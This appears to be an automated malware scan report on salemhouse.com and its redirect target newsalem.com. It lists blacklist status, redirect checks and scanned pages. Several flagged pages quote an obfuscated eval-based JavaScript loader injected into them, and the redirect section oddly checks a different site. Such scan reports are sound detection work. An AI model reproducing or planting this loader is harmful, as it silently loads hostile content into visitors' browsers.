Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=salemhouse.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thedigitals.co.uk
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 27 Feb 2015 07:10:08 GMT
Via: 1.1 vegur
Location: http://thedigitalsawards.com
Server: WEBrick/1.3.1 (Ruby/1.9.3/2013-06-27)
Content-Length: 0
Content-Type: text/html;charset=utf-8
X-Frame-Options: sameorigin
X-Xss-Protection: 1; mode=block
...0 bytes of data.
GET / HTTP/1.1
Host: thedigitals.co.uk
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 27 Feb 2015 07:10:08 GMT
Via: 1.1 vegur
Location: http://thedigitalsawards.com
Server: WEBrick/1.3.1 (Ruby/1.9.3/2013-06-27)
Content-Length: 0
Content-Type: text/html;charset=utf-8
X-Frame-Options: sameorigin
X-Xss-Protection: 1; mode=block
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: thedigitals.co.uk
Referer: http://www.google.com/search?q=thedigitals.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thedigitals.co.uk
Referer: http://www.google.com/search?q=thedigitals.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://salemhouse.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Thu, 25 Dec 2014 19:13:37 GMT Age: 0 Location: http://newsalem.com Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | malicious |
http://newsalem.com/ | HTTP/1.1 200 OK Date: Thu, 25 Dec 2014 19:13:38 GMT Accept-Ranges: bytes ETag: "417d8ac93e46ce1:46d" Server: Microsoft-IIS/6.0 Content-Length: 9572 Content-Location: http://newsalem.com/newsalem/index.htm Content-Type: text/html Last-Modified: Wed, 01 May 2013 07:37:52 GMT X-Powered-By: ASP.NET | clean |
http://newsalem.com/newsalem/index.htm | 200 OK Content-Length: 9572 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=eval("Str"+"ing");d=document;a="68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,7b,7b,73,6e,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,7b,7b,73,6e,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,72,63,70,76,6a,67,74,69,74,63,72,6a,6b,65,75,30,70,67,76,31,43,65,65,67,6e,61,4f,63,6b,6e,6b,70,69,31,65,6e,6b,65,6d,67,74,30,72,6a,72,29,3d, ...[3898 bytes skipped]... Antivirus reports:
| ||
http://newsalem.com/newsalem/salemhse/index.htm | 200 OK Content-Length: 7180 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=eval("Str"+"ing");d=document;a="68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,69,67,6b,63,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,69,67,6b,63,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,70,75,75,2f,72,64,74,30,65,71,6f,31,75,6a,71,79,65,63,6e,6e,2f,75,67,74,78,6b,65,67,75,30,65,71,6f,31,74,67,6e,30,72,6a,72,29,3d,f,c,22,22,22,22,69,67,6b,63,30,75,76,7b,6e,67,30,72,71 Antivirus reports:
| ||
http://newsalem.com/newsalem/salemhse/../artcraft/index.shtml | 200 OK Content-Length: 8330 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=eval("Str"+"ing");d=document;a="68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,7b,7b,73,6e,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,7b,7b,73,6e,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,72,63,70,76,6a,67,74,69,74,63,72,6a,6b,65,75,30,70,67,76,31,43,65,65,67,6e,61,4f,63,6b,6e,6b,70,69,31,65,6e,6b,65,6d,67,74,30,72,6a,72,29,3d,f,c,22,22,22,22,7b,7b,73,6e,30,75,76,7b,6e Antivirus reports:
| ||
http://newsalem.com/newsalem/salemhse/../artcraft/ | 200 OK Content-Length: 8330 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=eval("Str"+"ing");d=document;a="68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,7b,7b,73,6e,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,7b,7b,73,6e,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,72,63,70,76,6a,67,74,69,74,63,72,6a,6b,65,75,30,70,67,76,31,43,65,65,67,6e,61,4f,63,6b,6e,6b,70,69,31,65,6e,6b,65,6d,67,74,30,72,6a,72,29,3d,f,c,22,22,22,22,7b,7b,73,6e,30,75,76,7b,6e Antivirus reports:
| ||
http://newsalem.com/newsalem/salemhse/../artcraft/../kingc/index.shtml | 200 OK Content-Length: 7298 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=eval("Str"+"ing");d=document;a="68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,69,67,6b,63,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,69,67,6b,63,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,70,75,75,2f,72,64,74,30,65,71,6f,31,75,6a,71,79,65,63,6e,6e,2f,75,67,74,78,6b,65,67,75,30,65,71,6f,31,74,67,6e,30,72,6a,72,29,3d,f,c,22,22,22,22,69,67,6b,63,30,75,76,7b,6e,67,30,72,71 Antivirus reports:
| ||
http://newsalem.com/newsalem/salemhse/../artcraft/../kingc/../pottery/index.shtml | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
http://newsalem.com/test404page.js | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
http://newsalem.com/newsalem/salemhse/../artcraft/../kingc/../artcraft/folkart/index.shtml | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
http://newsalem.com/newsalem/salemhse/../artcraft/../kingc/../kingspottery/index.shtml | 200 OK Content-Length: 7957 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=eval("Str"+"ing");d=document;a="68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,69,67,6b,63,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,69,67,6b,63,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,70,75,75,2f,72,64,74,30,65,71,6f,31,75,6a,71,79,65,63,6e,6e,2f,75,67,74,78,6b,65,67,75,30,65,71,6f,31,74,67,6e,30,72,6a,72,29,3d,f,c,22,22,22,22,69,67,6b,63,30,75,76,7b,6e,67,30,72,71 Antivirus reports:
| ||
http://newsalem.com/newsalem/salemhse/../artcraft/../kingc/../kingspottery/../kingc/index.shtml | 200 OK Content-Length: 7298 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=eval("Str"+"ing");d=document;a="68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,69,67,6b,63,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,69,67,6b,63,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,70,75,75,2f,72,64,74,30,65,71,6f,31,75,6a,71,79,65,63,6e,6e,2f,75,67,74,78,6b,65,67,75,30,65,71,6f,31,74,67,6e,30,72,6a,72,29,3d,f,c,22,22,22,22,69,67,6b,63,30,75,76,7b,6e,67,30,72,71 Antivirus reports:
| ||
http://newsalem.com/newsalem/salemhse/../artcraft/../kingc/../kingspottery/../kingc/../pottery/index.shtml | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
http://newsalem.com/newsalem/salemhse/../artcraft/../kingc/../kingspottery/../kingc/../artcraft/folkart/index.shtml | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
http://newsalem.com/newsalem/salemhse/../artcraft/../kingc/../kingspottery/../kingc/../kingspottery/index.shtml | 200 OK Content-Length: 7957 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=eval("Str"+"ing");d=document;a="68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,69,67,6b,63,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,69,67,6b,63,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,70,75,75,2f,72,64,74,30,65,71,6f,31,75,6a,71,79,65,63,6e,6e,2f,75,67,74,78,6b,65,67,75,30,65,71,6f,31,74,67,6e,30,72,6a,72,29,3d,f,c,22,22,22,22,69,67,6b,63,30,75,76,7b,6e,67,30,72,71 Antivirus reports:
| ||
http://newsalem.com/newsalem/salemhse/../artcraft/../kingc/../kingspottery/../kingc/../kingspottery/../kingc/index.shtml | 200 OK Content-Length: 7298 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=eval("Str"+"ing");d=document;a="68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,69,67,6b,63,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,69,67,6b,63,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,70,75,75,2f,72,64,74,30,65,71,6f,31,75,6a,71,79,65,63,6e,6e,2f,75,67,74,78,6b,65,67,75,30,65,71,6f,31,74,67,6e,30,72,6a,72,29,3d,f,c,22,22,22,22,69,67,6b,63,30,75,76,7b,6e,67,30,72,71 Antivirus reports:
| ||
http://newsalem.com/newsalem/salemhse/../artcraft/../kingc/../kingspottery/../kingc/../kingspottery/../kingc/../pottery/index.shtml | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |